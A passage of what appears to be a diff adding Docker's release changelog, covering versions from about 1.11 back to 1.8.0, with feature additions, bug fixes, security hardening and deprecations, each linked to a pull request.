([#21019](https://github.com/docker/docker/pull/21019)) +- Fixed a bug which prevents docker reload after a network delete during shutdown ([#20214](https://github.com/docker/docker/pull/20214)) +- Make sure iptables chains are recreated on firewalld reload ([#20419](https://github.com/docker/docker/pull/20419)) +- Allow to pass global datastore during config reload ([#20419](https://github.com/docker/docker/pull/20419)) +- For anonymous containers use the alias name for IP to name mapping, i.e. DNS PTR record ([#21019](https://github.com/docker/docker/pull/21019)) +- Fix a panic when deleting an entry from /etc/hosts file ([#21019](https://github.com/docker/docker/pull/21019)) +- Source the forwarded DNS queries from the container net namespace ([#21019](https://github.com/docker/docker/pull/21019)) +- Fix to retain 
the network internal mode config for bridge networks on daemon reload ([#21780](https://github.com/docker/docker/pull/21780)) +- Fix to retain IPAM driver option configs on daemon reload ([#21914](https://github.com/docker/docker/pull/21914)) + +### Plugins + +- Fix a file descriptor leak that would occur every time plugins were enumerated ([#20686](https://github.com/docker/docker/pull/20686)) +- Fix an issue where Authz plugin would corrupt the payload body when faced with a large amount of data ([#20602](https://github.com/docker/docker/pull/20602)) + +### Runtime + +- Fix a panic that could occur when cleaning up after a container started with invalid parameters ([#21716](https://github.com/docker/docker/pull/21716)) +- Fix a race with event timers stopping early ([#21692](https://github.com/docker/docker/pull/21692)) +- Fix race conditions in the layer store, potentially corrupting the map and crashing the process ([#21677](https://github.com/docker/docker/pull/21677)) +- Un-deprecate auto-creation of host directories for mounts. This feature was marked deprecated in ([#21666](https://github.com/docker/docker/pull/21666)) + Docker 1.9, but was decided to be too much of a backward-incompatible change, so it was decided to keep the feature. 
++ It is now possible for containers to share the NET and IPC namespaces when `userns` is enabled ([#21383](https://github.com/docker/docker/pull/21383)) ++ `docker inspect ` will now expose the rootfs layers ([#21370](https://github.com/docker/docker/pull/21370)) ++ Docker Windows gained a minimal `top` implementation ([#21354](https://github.com/docker/docker/pull/21354)) +* Docker learned to report the faulty exe when a container cannot be started due to its condition ([#21345](https://github.com/docker/docker/pull/21345)) +* Docker with device mapper will now refuse to run if `udev sync` is not available ([#21097](https://github.com/docker/docker/pull/21097)) +- Fix a bug where Docker would not validate the config file upon configuration reload ([#21089](https://github.com/docker/docker/pull/21089)) +- Fix a hang that would happen on attach if initial start was to fail ([#21048](https://github.com/docker/docker/pull/21048)) +- Fix an issue where registry service options in the daemon configuration file were not properly taken into account ([#21045](https://github.com/docker/docker/pull/21045)) +- Fix a race between the exec and resize operations ([#21022](https://github.com/docker/docker/pull/21022)) +- Fix an issue where nanoseconds were not correctly taken into account when filtering Docker events ([#21013](https://github.com/docker/docker/pull/21013)) +- Fix the handling of Docker command when passed a 64 bytes id ([#21002](https://github.com/docker/docker/pull/21002)) +* Docker will now return a `204` (i.e. http.StatusNoContent) code when it successfully deleted a network ([#20977](https://github.com/docker/docker/pull/20977)) +- Fix a bug where the daemon would wait indefinitely in case the process it was about to kill had already exited on its own ([#20967](https://github.com/docker/docker/pull/20967)) +* The devmapper driver learned the `dm.min_free_space` option. 
If the mapped device free space reaches the passed value, new device creation will be prohibited. ([#20786](https://github.com/docker/docker/pull/20786)) ++ Docker can now prevent processes in container to gain new privileges via the `--security-opt=no-new-privileges` flag ([#20727](https://github.com/docker/docker/pull/20727)) +- Starting a container with the `--device` option will now correctly resolve symlinks ([#20684](https://github.com/docker/docker/pull/20684)) ++ Docker now relies on [`containerd`](https://github.com/docker/containerd) and [`runc`](https://github.com/opencontainers/runc) to spawn containers. ([#20662](https://github.com/docker/docker/pull/20662)) +- Fix docker configuration reloading to only alter values present in the given config file ([#20604](https://github.com/docker/docker/pull/20604)) ++ Docker now allows setting a container hostname via the `--hostname` flag when `--net=host` ([#20177](https://github.com/docker/docker/pull/20177)) ++ Docker now allows executing privileged container while running with `--userns-remap` if both `--privileged` and the new `--userns=host` flag are specified ([#20111](https://github.com/docker/docker/pull/20111)) +- Fix Docker not cleaning up correctly old containers upon restarting after a crash ([#19679](https://github.com/docker/docker/pull/19679)) +* Docker will now error out if it doesn't recognize a configuration key within the config file ([#19517](https://github.com/docker/docker/pull/19517)) +- Fix container loading, on daemon startup, when they depend on a plugin running within a container ([#19500](https://github.com/docker/docker/pull/19500)) +* `docker update` learned how to change a container restart policy ([#19116](https://github.com/docker/docker/pull/19116)) +* `docker inspect` now also returns a new `State` field containing the container state in a human readable way (i.e. 
one of `created`, `restarting`, `running`, `paused`, `exited` or `dead`)([#18966](https://github.com/docker/docker/pull/18966)) ++ Docker learned to limit the number of active pids (i.e. processes) within the container via the `pids-limit` flags. NOTE: This requires `CGROUP_PIDS=y` to be in the kernel configuration. ([#18697](https://github.com/docker/docker/pull/18697)) +- `docker load` now has a `--quiet` option to suppress the load output ([#20078](https://github.com/docker/docker/pull/20078)) +- Fix a bug in neighbor discovery for IPv6 peers ([#20842](https://github.com/docker/docker/pull/20842)) +- Fix a panic during cleanup if a container was started with invalid options ([#21802](https://github.com/docker/docker/pull/21802)) +- Fix a situation where a container cannot be stopped if the terminal is closed ([#21840](https://github.com/docker/docker/pull/21840)) + +### Security + +* Object with the `pcp_pmcd_t` selinux type were given management access to `/var/lib/docker(/.*)?` ([#21370](https://github.com/docker/docker/pull/21370)) +* `restart_syscall`, `copy_file_range`, `mlock2` joined the list of allowed calls in the default seccomp profile ([#21117](https://github.com/docker/docker/pull/21117), [#21262](https://github.com/docker/docker/pull/21262)) +* `send`, `recv` and `x32` were added to the list of allowed syscalls and arch in the default seccomp profile ([#19432](https://github.com/docker/docker/pull/19432)) +* Docker Content Trust now requests the server to perform snapshot signing ([#21046](https://github.com/docker/docker/pull/21046)) +* Support for using YubiKeys for Content Trust signing has been moved out of experimental ([#21591](https://github.com/docker/docker/pull/21591)) + +### Volumes + +* Output of `docker volume ls` is now sorted by volume name ([#20389](https://github.com/docker/docker/pull/20389)) +* Local volumes can now accept options similar to the unix `mount` tool ([#20262](https://github.com/docker/docker/pull/20262)) +- Fix an 
issue where one letter directory name could not be used as source for volumes ([#21106](https://github.com/docker/docker/pull/21106)) ++ `docker run -v` now accepts a new flag `nocopy`. This tells the runtime not to copy the container path content into the volume (which is the default behavior) ([#21223](https://github.com/docker/docker/pull/21223)) + +## 1.10.3 (2016-03-10) + +### Runtime + +- Fix Docker client exiting with an "Unrecognized input header" error [#20706](https://github.com/docker/docker/pull/20706) +- Fix Docker exiting if Exec is started with both `AttachStdin` and `Detach` [#20647](https://github.com/docker/docker/pull/20647) + +### Distribution + +- Fix a crash when pushing multiple images sharing the same layers to the same repository in parallel [#20831](https://github.com/docker/docker/pull/20831) +- Fix a panic when pushing images to a registry which uses a misconfigured token service [#21030](https://github.com/docker/docker/pull/21030) + +### Plugin system + +- Fix issue preventing volume plugins to start when SELinux is enabled [#20834](https://github.com/docker/docker/pull/20834) +- Prevent Docker from exiting if a volume plugin returns a null response for Get requests [#20682](https://github.com/docker/docker/pull/20682) +- Fix plugin system leaking file descriptors if a plugin has an error [#20680](https://github.com/docker/docker/pull/20680) + +### Security + +- Fix linux32 emulation to fail during docker build [#20672](https://github.com/docker/docker/pull/20672) + It was due to the `personality` syscall being blocked by the default seccomp profile. +- Fix Oracle XE 10g failing to start in a container [#20981](https://github.com/docker/docker/pull/20981) + It was due to the `ipc` syscall being blocked by the default seccomp profile. 
+- Fix user namespaces not working on Linux From Scratch [#20685](https://github.com/docker/docker/pull/20685) +- Fix issue preventing daemon to start if userns is enabled and the `subuid` or `subgid` files contain comments [#20725](https://github.com/docker/docker/pull/20725) + +## 1.10.2 (2016-02-22) + +### Runtime + +- Prevent systemd from deleting containers' cgroups when its configuration is reloaded [#20518](https://github.com/docker/docker/pull/20518) +- Fix SELinux issues by disregarding `--read-only` when mounting `/dev/mqueue` [#20333](https://github.com/docker/docker/pull/20333) +- Fix chown permissions used during `docker cp` when userns is used [#20446](https://github.com/docker/docker/pull/20446) +- Fix configuration loading issue with all booleans defaulting to `true` [#20471](https://github.com/docker/docker/pull/20471) +- Fix occasional panic with `docker logs -f` [#20522](https://github.com/docker/docker/pull/20522) + +### Distribution + +- Keep layer reference if deletion failed to avoid a badly inconsistent state [#20513](https://github.com/docker/docker/pull/20513) +- Handle gracefully a corner case when canceling migration [#20372](https://github.com/docker/docker/pull/20372) +- Fix docker import on compressed data [#20367](https://github.com/docker/docker/pull/20367) +- Fix tar-split files corruption during migration that later cause docker push and docker save to fail [#20458](https://github.com/docker/docker/pull/20458) + +### Networking + +- Fix daemon crash if embedded DNS is sent garbage [#20510](https://github.com/docker/docker/pull/20510) + +### Volumes + +- Fix issue with multiple volume references with same name [#20381](https://github.com/docker/docker/pull/20381) + +### Security + +- Fix potential cache corruption and delegation conflict issues [#20523](https://github.com/docker/docker/pull/20523) + +## 1.10.1 (2016-02-11) + +### Runtime + +* Do not stop daemon on migration hard failure 
[#20156](https://github.com/docker/docker/pull/20156) +- Fix various issues with migration to content-addressable images [#20058](https://github.com/docker/docker/pull/20058) +- Fix ZFS permission bug with user namespaces [#20045](https://github.com/docker/docker/pull/20045) +- Do not leak /dev/mqueue from the host to all containers, keep it container-specific [#19876](https://github.com/docker/docker/pull/19876) [#20133](https://github.com/docker/docker/pull/20133) +- Fix `docker ps --filter before=...` to not show stopped containers without providing `-a` flag [#20135](https://github.com/docker/docker/pull/20135) + +### Security + +- Fix issue preventing docker events to work properly with authorization plugin [#20002](https://github.com/docker/docker/pull/20002) + +### Distribution + +* Add additional verifications and prevent from uploading invalid data to registries [#20164](https://github.com/docker/docker/pull/20164) +- Fix regression preventing uppercase characters in image reference hostname [#20175](https://github.com/docker/docker/pull/20175) + +### Networking + +- Fix embedded DNS for user-defined networks in the presence of firewalld [#20060](https://github.com/docker/docker/pull/20060) +- Fix issue where removing a network during shutdown left Docker inoperable [#20181](https://github.com/docker/docker/issues/20181) [#20235](https://github.com/docker/docker/issues/20235) +- Embedded DNS is now able to return compressed results [#20181](https://github.com/docker/docker/issues/20181) +- Fix port-mapping issue with `userland-proxy=false` [#20181](https://github.com/docker/docker/issues/20181) + +### Logging + +- Fix bug where tcp+tls protocol would be rejected [#20109](https://github.com/docker/docker/pull/20109) + +### Volumes + +- Fix issue whereby older volume drivers would not receive volume options [#19983](https://github.com/docker/docker/pull/19983) + +### Misc + +- Remove TasksMax from Docker systemd service 
[#20167](https://github.com/docker/docker/pull/20167) + +## 1.10.0 (2016-02-04) + +**IMPORTANT**: Docker 1.10 uses a new content-addressable storage for images and layers. +A migration is performed the first time docker is run, and can take a significant amount of time depending on the number of images present. +Refer to this page on the wiki for more information: https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration +We also released a cool migration utility that enables you to perform the migration before updating to reduce downtime. +Engine 1.10 migrator can be found on Docker Hub: https://hub.docker.com/r/docker/v1.10-migrator/ + +### Runtime + ++ New `docker update` command that allows updating resource constraints on running containers [#15078](https://github.com/docker/docker/pull/15078) ++ Add `--tmpfs` flag to `docker run` to create a tmpfs mount in a container [#13587](https://github.com/docker/docker/pull/13587) ++ Add `--format` flag to `docker images` command [#17692](https://github.com/docker/docker/pull/17692) ++ Allow to set daemon configuration in a file and hot-reload it with the `SIGHUP` signal [#18587](https://github.com/docker/docker/pull/18587) ++ Updated docker events to include more meta-data and event types [#18888](https://github.com/docker/docker/pull/18888) + This change is backward compatible in the API, but not on the CLI. 
++ Add `--blkio-weight-device` flag to `docker run` [#13959](https://github.com/docker/docker/pull/13959) ++ Add `--device-read-bps` and `--device-write-bps` flags to `docker run` [#14466](https://github.com/docker/docker/pull/14466) ++ Add `--device-read-iops` and `--device-write-iops` flags to `docker run` [#15879](https://github.com/docker/docker/pull/15879) ++ Add `--oom-score-adj` flag to `docker run` [#16277](https://github.com/docker/docker/pull/16277) ++ Add `--detach-keys` flag to `attach`, `run`, `start` and `exec` commands to override the default key sequence that detaches from a container [#15666](https://github.com/docker/docker/pull/15666) ++ Add `--shm-size` flag to `run`, `create` and `build` to set the size of `/dev/shm` [#16168](https://github.com/docker/docker/pull/16168) ++ Show the number of running, stopped, and paused containers in `docker info` [#19249](https://github.com/docker/docker/pull/19249) ++ Show the `OSType` and `Architecture` in `docker info` [#17478](https://github.com/docker/docker/pull/17478) ++ Add `--cgroup-parent` flag on `daemon` to set cgroup parent for all containers [#19062](https://github.com/docker/docker/pull/19062) ++ Add `-L` flag to docker cp to follow symlinks [#16613](https://github.com/docker/docker/pull/16613) ++ New `status=dead` filter for `docker ps` [#17908](https://github.com/docker/docker/pull/17908) +* Change `docker run` exit codes to distinguish between runtime and application errors [#14012](https://github.com/docker/docker/pull/14012) +* Enhance `docker events --since` and `--until` to support nanoseconds and timezones [#17495](https://github.com/docker/docker/pull/17495) +* Add `--all`/`-a` flag to `stats` to include both running and stopped containers [#16742](https://github.com/docker/docker/pull/16742) +* Change the default cgroup-driver to `cgroupfs` [#17704](https://github.com/docker/docker/pull/17704) +* Emit a "tag" event when tagging an image with `build -t` 
[#17115](https://github.com/docker/docker/pull/17115) +* Best effort for linked containers' start order when starting the daemon [#18208](https://github.com/docker/docker/pull/18208) +* Add ability to add multiple tags on `build` [#15780](https://github.com/docker/docker/pull/15780) +* Permit `OPTIONS` request against any url, thus fixing issue with CORS [#19569](https://github.com/docker/docker/pull/19569) +- Fix the `--quiet` flag on `docker build` to actually be quiet [#17428](https://github.com/docker/docker/pull/17428) +- Fix `docker images --filter dangling=false` to now show all non-dangling images [#19326](https://github.com/docker/docker/pull/19326) +- Fix race condition causing autorestart turning off on restart [#17629](https://github.com/docker/docker/pull/17629) +- Recognize GPFS filesystems [#19216](https://github.com/docker/docker/pull/19216) +- Fix obscure bug preventing to start containers [#19751](https://github.com/docker/docker/pull/19751) +- Forbid `exec` during container restart [#19722](https://github.com/docker/docker/pull/19722) +- devicemapper: Increasing `--storage-opt dm.basesize` will now increase the base device size on daemon restart [#19123](https://github.com/docker/docker/pull/19123) + +### Security + ++ Add `--userns-remap` flag to `daemon` to support user namespaces (previously in experimental) [#19187](https://github.com/docker/docker/pull/19187) ++ Add support for custom seccomp profiles in `--security-opt` [#17989](https://github.com/docker/docker/pull/17989) ++ Add default seccomp profile [#18780](https://github.com/docker/docker/pull/18780) ++ Add `--authorization-plugin` flag to `daemon` to customize ACLs [#15365](https://github.com/docker/docker/pull/15365) ++ Docker Content Trust now supports the ability to read and write user delegations [#18887](https://github.com/docker/docker/pull/18887) + This is an optional, opt-in feature that requires the explicit use of the Notary command-line utility in order to be enabled. 
+ Enabling delegation support in a specific repository will break the ability of Docker 1.9 and 1.8 to pull from that repository, if content trust is enabled. +* Allow SELinux to run in a container when using the BTRFS storage driver [#16452](https://github.com/docker/docker/pull/16452) + +### Distribution + +* Use content-addressable storage for images and layers [#17924](https://github.com/docker/docker/pull/17924) + Note that a migration is performed the first time docker is run; it can take a significant amount of time depending on the number of images and containers present. + Images no longer depend on the parent chain but contain a list of layer references. + `docker load`/`docker save` tarballs now also contain content-addressable image configurations. + For more information: https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration +* Add support for the new [manifest format ("schema2")](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-2.md) [#18785](https://github.com/docker/docker/pull/18785) +* Lots of improvements for push and pull: performance++, retries on failed downloads, cancelling on client disconnect [#18353](https://github.com/docker/docker/pull/18353), [#18418](https://github.com/docker/docker/pull/18418), [#19109](https://github.com/docker/docker/pull/19109), [#18353](https://github.com/docker/docker/pull/18353) +* Limit v1 protocol fallbacks [#18590](https://github.com/docker/docker/pull/18590) +- Fix issue where docker could hang indefinitely waiting for a nonexistent process to pull an image [#19743](https://github.com/docker/docker/pull/19743) + +### Networking + ++ Use DNS-based discovery instead of `/etc/hosts` [#19198](https://github.com/docker/docker/pull/19198) ++ Support for network-scoped alias using `--net-alias` on `run` and `--alias` on `network connect` [#19242](https://github.com/docker/docker/pull/19242) ++ Add `--ip` and `--ip6` on `run` and `network connect` to support 
custom IP addresses for a container in a network [#19001](https://github.com/docker/docker/pull/19001) ++ Add `--ipam-opt` to `network create` for passing custom IPAM options [#17316](https://github.com/docker/docker/pull/17316) ++ Add `--internal` flag to `network create` to restrict external access to and from the network [#19276](https://github.com/docker/docker/pull/19276) ++ Add `kv.path` option to `--cluster-store-opt` [#19167](https://github.com/docker/docker/pull/19167) ++ Add `discovery.heartbeat` and `discovery.ttl` options to `--cluster-store-opt` to configure discovery TTL and heartbeat timer [#18204](https://github.com/docker/docker/pull/18204) ++ Add `--format` flag to `network inspect` [#17481](https://github.com/docker/docker/pull/17481) ++ Add `--link` to `network connect` to provide a container-local alias [#19229](https://github.com/docker/docker/pull/19229) ++ Support for Capability exchange with remote IPAM plugins [#18775](https://github.com/docker/docker/pull/18775) ++ Add `--force` to `network disconnect` to force container to be disconnected from network [#19317](https://github.com/docker/docker/pull/19317) +* Support for multi-host networking using built-in overlay driver for all engine supported kernels: 3.10+ [#18775](https://github.com/docker/docker/pull/18775) +* `--link` is now supported on `docker run` for containers in user-defined network [#19229](https://github.com/docker/docker/pull/19229) +* Enhance `docker network rm` to allow removing multiple networks [#17489](https://github.com/docker/docker/pull/17489) +* Include container names in `network inspect` [#17615](https://github.com/docker/docker/pull/17615) +* Include auto-generated subnets for user-defined networks in `network inspect` [#17316](https://github.com/docker/docker/pull/17316) +* Add `--filter` flag to `network ls` to hide predefined networks [#17782](https://github.com/docker/docker/pull/17782) +* Add support for network connect/disconnect to stopped containers 
[#18906](https://github.com/docker/docker/pull/18906) +* Add network ID to container inspect [#19323](https://github.com/docker/docker/pull/19323) +- Fix MTU issue where Docker would not start with two or more default routes [#18108](https://github.com/docker/docker/pull/18108) +- Fix duplicate IP address for containers [#18106](https://github.com/docker/docker/pull/18106) +- Fix issue preventing sometimes docker from creating the bridge network [#19338](https://github.com/docker/docker/pull/19338) +- Do not substitute 127.0.0.1 name server when using `--net=host` [#19573](https://github.com/docker/docker/pull/19573) + +### Logging + ++ New logging driver for Splunk [#16488](https://github.com/docker/docker/pull/16488) ++ Add support for syslog over TCP+TLS [#18998](https://github.com/docker/docker/pull/18998) +* Enhance `docker logs --since` and `--until` to support nanoseconds and time [#17495](https://github.com/docker/docker/pull/17495) +* Enhance AWS logs to auto-detect region [#16640](https://github.com/docker/docker/pull/16640) + +### Volumes + ++ Add support to set the mount propagation mode for a volume [#17034](https://github.com/docker/docker/pull/17034) +* Add `ls` and `inspect` endpoints to volume plugin API [#16534](https://github.com/docker/docker/pull/16534) + Existing plugins need to make use of these new APIs to satisfy users' expectation + For that, please use the new MIME type `application/vnd.docker.plugins.v1.2+json` [#19549](https://github.com/docker/docker/pull/19549) +- Fix data not being copied to named volumes [#19175](https://github.com/docker/docker/pull/19175) +- Fix issues preventing volume drivers from being containerized [#19500](https://github.com/docker/docker/pull/19500) +- Fix `docker volumes ls --dangling=false` to now show all non-dangling volumes [#19671](https://github.com/docker/docker/pull/19671) +- Do not remove named volumes on container removal [#19568](https://github.com/docker/docker/pull/19568) +- Allow external 
volume drivers to host anonymous volumes [#19190](https://github.com/docker/docker/pull/19190) + +### Builder + ++ Add support for `**` in `.dockerignore` to wildcard multiple levels of directories [#17090](https://github.com/docker/docker/pull/17090) +- Fix handling of UTF-8 characters in Dockerfiles [#17055](https://github.com/docker/docker/pull/17055) +- Fix permissions problem when reading from STDIN [#19283](https://github.com/docker/docker/pull/19283) + +### Client + ++ Add support for overriding the API version to use via an `DOCKER_API_VERSION` environment-variable [#15964](https://github.com/docker/docker/pull/15964) +- Fix a bug preventing Windows clients to log in to Docker Hub [#19891](https://github.com/docker/docker/pull/19891) + +### Misc + +* systemd: Set TasksMax in addition to LimitNPROC in systemd service file [#19391](https://github.com/docker/docker/pull/19391) + +### Deprecations + +* Remove LXC support. The LXC driver was deprecated in Docker 1.8, and has now been removed [#17700](https://github.com/docker/docker/pull/17700) +* Remove `--exec-driver` daemon flag, because it is no longer in use [#17700](https://github.com/docker/docker/pull/17700) +* Remove old deprecated single-dashed long CLI flags (such as `-rm`; use `--rm` instead) [#17724](https://github.com/docker/docker/pull/17724) +* Deprecate HostConfig at API container start [#17799](https://github.com/docker/docker/pull/17799) +* Deprecate docker packages for newly EOL'd Linux distributions: Fedora 21 and Ubuntu 15.04 (Vivid) [#18794](https://github.com/docker/docker/pull/18794), [#18809](https://github.com/docker/docker/pull/18809) +* Deprecate `-f` flag for docker tag [#18350](https://github.com/docker/docker/pull/18350) + +## 1.9.1 (2015-11-21) + +### Runtime + +- Do not prevent daemon from booting if images could not be restored (#17695) +- Force IPC mount to unmount on daemon shutdown/init (#17539) +- Turn IPC unmount errors into warnings (#17554) +- Fix `docker stats` 
performance regression (#17638) +- Clarify cryptic error message upon `docker logs` if `--log-driver=none` (#17767) +- Fix seldom panics (#17639, #17634, #17703) +- Fix opq whiteouts problems for files with dot prefix (#17819) +- devicemapper: try defaulting to xfs instead of ext4 for performance reasons (#17903, #17918) +- devicemapper: fix displayed fs in docker info (#17974) +- selinux: only relabel if user requested so with the `z` option (#17450, #17834) +- Do not make network calls when normalizing names (#18014) + +### Client + +- Fix `docker login` on windows (#17738) +- Fix bug with `docker inspect` output when not connected to daemon (#17715) +- Fix `docker inspect -f {{.HostConfig.Dns}} somecontainer` (#17680) + +### Builder + +- Fix regression with symlink behavior in ADD/COPY (#17710) + +### Networking + +- Allow passing a network ID as an argument for `--net` (#17558) +- Fix connect to host and prevent disconnect from host for `host` network (#17476) +- Fix `--fixed-cidr` issue when gateway ip falls in ip-range and ip-range is + not the first block in the network (#17853) +- Restore deterministic `IPv6` generation from `MAC` address on default `bridge` network (#17890) +- Allow port-mapping only for endpoints created on docker run (#17858) +- Fixed an endpoint delete issue with a possible stale sbox (#18102) + +### Distribution + +- Correct parent chain in v2 push when v1Compatibility files on the disk are inconsistent (#18047) + +## 1.9.0 (2015-11-03) + +### Runtime + ++ `docker stats` now returns block IO metrics (#15005) ++ `docker stats` now details network stats per interface (#15786) ++ Add `ancestor=` filter to `docker ps --filter` flag to filter +containers based on their ancestor images (#14570) ++ Add `label=` filter to `docker ps --filter` to filter containers +based on label (#16530) ++ Add `--kernel-memory` flag to `docker run` (#14006) ++ Add `--message` flag to `docker import` allowing to specify an optional +message (#15711) ++ Add 
`--privileged` flag to `docker exec` (#14113) ++ Add `--stop-signal` flag to `docker run` allowing to replace the container +process stopping signal (#15307) ++ Add a new `unless-stopped` restart policy (#15348) ++ Inspecting an image now returns tags (#13185) ++ Add container size information to `docker inspect` (#15796) ++ Add `RepoTags` and `RepoDigests` field to `/images/{name:.*}/json` (#17275) +- Remove the deprecated `/container/ps` endpoint from the API (#15972) +- Send and document correct HTTP codes for `/exec//start` (#16250) +- Share shm and mqueue between containers sharing IPC namespace (#15862) +- Event stream now shows OOM status when `--oom-kill-disable` is set (#16235) +- Ensure special network files (/etc/hosts etc.) are read-only if bind-mounted +with `ro` option (#14965) +- Improve `rmi` performance (#16890) +- Do not update /etc/hosts for the default bridge network, except for links (#17325) +- Fix conflict with duplicate container names (#17389) +- Fix an issue with incorrect template execution in `docker inspect` (#17284) +- DEPRECATE `-c` short flag variant for `--cpu-shares` in docker run (#16271) + +### Client + ++ Allow `docker import` to import from local files (#11907) + +### Builder + ++ Add a `STOPSIGNAL` Dockerfile instruction allowing to set a different +stop-signal for the container process (#15307) ++ Add an `ARG` Dockerfile instruction and a `--build-arg` flag to `docker build` +that allows to add build-time environment variables (#15182) +- Improve cache miss performance (#16890) + +### Storage + +- devicemapper: Implement deferred deletion capability (#16381) + +## Networking + ++ `docker network` exits experimental and is part of standard release (#16645) ++ New network top-level concept, with associated subcommands and API (#16645) + WARNING: the API is different from the experimental API ++ Support for multiple isolated/micro-segmented networks (#16645) ++ Built-in multihost networking using VXLAN based overlay driver 
(#14071) ++ Support for third-party network plugins (#13424) ++ Ability to dynamically connect containers to multiple networks (#16645) ++ Support for user-defined IP address management via pluggable IPAM drivers (#16910) ++ Add daemon flags `--cluster-store` and `--cluster-advertise` for built-in nodes discovery (#16229) ++ Add `--cluster-store-opt` for setting up TLS settings (#16644) ++ Add `--dns-opt` to the daemon (#16031) +- DEPRECATE following container `NetworkSettings` fields in API v1.21: `EndpointID`, `Gateway`, + `GlobalIPv6Address`, `GlobalIPv6PrefixLen`, `IPAddress`, `IPPrefixLen`, `IPv6Gateway` and `MacAddress`. + Those are now specific to the `bridge` network. Use `NetworkSettings.Networks` to inspect + the networking settings of a container per network. + +### Volumes + ++ New top-level `volume` subcommand and API (#14242) +- Move API volume driver settings to host-specific config (#15798) +- Print an error message if volume name is not unique (#16009) +- Ensure volumes created from Dockerfiles always use the local volume driver +(#15507) +- DEPRECATE auto-creating missing host paths for bind mounts (#16349) + +### Logging + ++ Add `awslogs` logging driver for Amazon CloudWatch (#15495) ++ Add generic `tag` log option to allow customizing container/image +information passed to driver (e.g. show container names) (#15384) +- Implement the `docker logs` endpoint for the journald driver (#13707) +- DEPRECATE driver-specific log tags (e.g. `syslog-tag`, etc.) 
(#15384) + +### Distribution + ++ `docker search` now works with partial names (#16509) +- Push optimization: avoid buffering to file (#15493) +- The daemon will display progress for images that were already being pulled +by another client (#15489) +- Only permissions required for the current action being performed are requested (#) ++ Renaming trust keys (and respective environment variables) from `offline` to +`root` and `tagging` to `repository` (#16894) +- DEPRECATE trust key environment variables +`DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE` and +`DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE` (#16894) + +### Security + ++ Add SELinux profiles to the rpm package (#15832) +- Fix various issues with AppArmor profiles provided in the deb package +(#14609) +- Add AppArmor policy that prevents writing to /proc (#15571) + +## 1.8.3 (2015-10-12) + +### Distribution + +- Fix layer IDs lead to local graph poisoning (CVE-2014-8178) +- Fix manifest validation and parsing logic errors allow pull-by-digest validation bypass (CVE-2014-8179) ++ Add `--disable-legacy-registry` to prevent a daemon from using a v1 registry + +## 1.8.2 (2015-09-10) + +### Distribution + +- Fixes rare edge case of handling GNU LongLink and LongName entries. +- Fix ^C on docker pull. +- Fix docker pull issues on client disconnection. +- Fix issue that caused the daemon to panic when loggers weren't configured properly. +- Fix goroutine leak pulling images from registry V2. + +### Runtime + +- Fix a bug mounting cgroups for docker daemons running inside docker containers. +- Initialize log configuration properly. + +### Client: + +- Handle `-q` flag in `docker ps` properly when there is a default format. + +### Networking + +- Fix several corner cases with netlink. + +### Contrib + +- Fix several issues with bash completion. 
+ +## 1.8.1 (2015-08-12) + +### Distribution + +* Fix a bug where pushing multiple tags would result in invalid images + +## 1.8.0 (2015-08-11) + +### Distribution + ++ Trusted pull, push and build, disabled by default +* Make tar layers deterministic between registries +* Don't allow deleting the image of running containers +* Check if a tag name to load is a valid digest +* Allow one character repository names +* Add a more accurate error description for invalid tag name +* Make build cache ignore mtime + +### Cli + ++ Add support for DOCKER_CONFIG/--config to specify config file dir ++ Add --type flag for docker inspect command ++ Add formatting options to `docker ps` with `--format` ++ Replace `docker -d` with new subcommand `docker daemon` +* Zsh completion updates and improvements +* Add some missing events to bash completion +* Support daemon urls with base paths in `docker -H` +* Validate status= filter to docker ps +* Display when a container is in --net=host in docker ps +* Extend docker inspect to export image metadata related to graph driver +* Restore --default-gateway{,-v6} daemon options +* Add missing unpublished ports in docker ps +* Allow duration strings in `docker events` as --since/--until +* Expose more mounts information in `docker inspect` + +### Runtime + ++ Add new Fluentd logging driver ++ Allow `docker import` to load from local files ++ Add logging driver for GELF via UDP ++ Allow to copy files from host to containers with `docker cp` ++ Promote volume drivers from experimental to master ++ Add rollover options to json-file log driver, and --log-driver-opts flag ++ Add memory swappiness tuning options +* Remove cgroup read-only flag when privileged +* Make /proc, /sys, & /dev readonly for readonly containers +* Add cgroup bind mount by default +* Overlay: Export metadata for container and image in `docker inspect` +* Devicemapper: external device activation +* Devicemapper: Compare uuid of base device on startup +* Remove RC4 from the 
list of registry cipher suites +* Add syslog-facility option +* LXC execdriver compatibility with recent LXC versions +* Mark LXC execdriver as deprecated (to be removed with the migration to runc) + +### Plugins + +* Separate plugin sockets and specs locations +* Allow TLS connections to plugins + +### Bug fixes + +- Add missing 'Names' field to /containers/json API output +- Make `docker rmi` of dangling images safe while pulling +- Devicemapper: Change default basesize to 100G +- Go Scheduler issue with sync.Mutex and gcc +- Fix issue where Search API endpoint would panic due to empty AuthConfig +- Set image canonical names correctly +- Check dockerinit only if lxc driver is used +- Fix ulimit usage of nproc +- Always attach STDIN if -i,--interactive is specified +- Show error messages when saving container state fails +- Fixed incorrect assumption on --bridge=none treated as disable network +- Check for invalid port specifications in host configuration +- Fix endpoint leave failure for --net=host mode +- Fix goroutine leak in the stats API if the container is not running +- Check for apparmor file before reading it +- Fix DOCKER_TLS_VERIFY being ignored +- Set umask to the default on startup +- Correct the message of pause and unpause a non-running container +- Adjust disallowed CpuShares in container creation +- ZFS: correctly apply selinux context +- Display empty string instead of `<nil>` when IP opt is nil +- `docker kill` returns error when container is not running +- Fix COPY/ADD quoted/json form +- Fix goroutine leak on logs -f with no output +- Remove panic in nat package on invalid hostport +- Fix container linking in Fedora 22 +- Fix error caused by using default gateways outside of the allocated range +- Format times in inspect command with a template as RFC3339Nano +- Make registry client to accept 2xx and 3xx http status responses as successful +- Fix race issue that caused the daemon to crash with certain layer downloads failed in a specific order. 
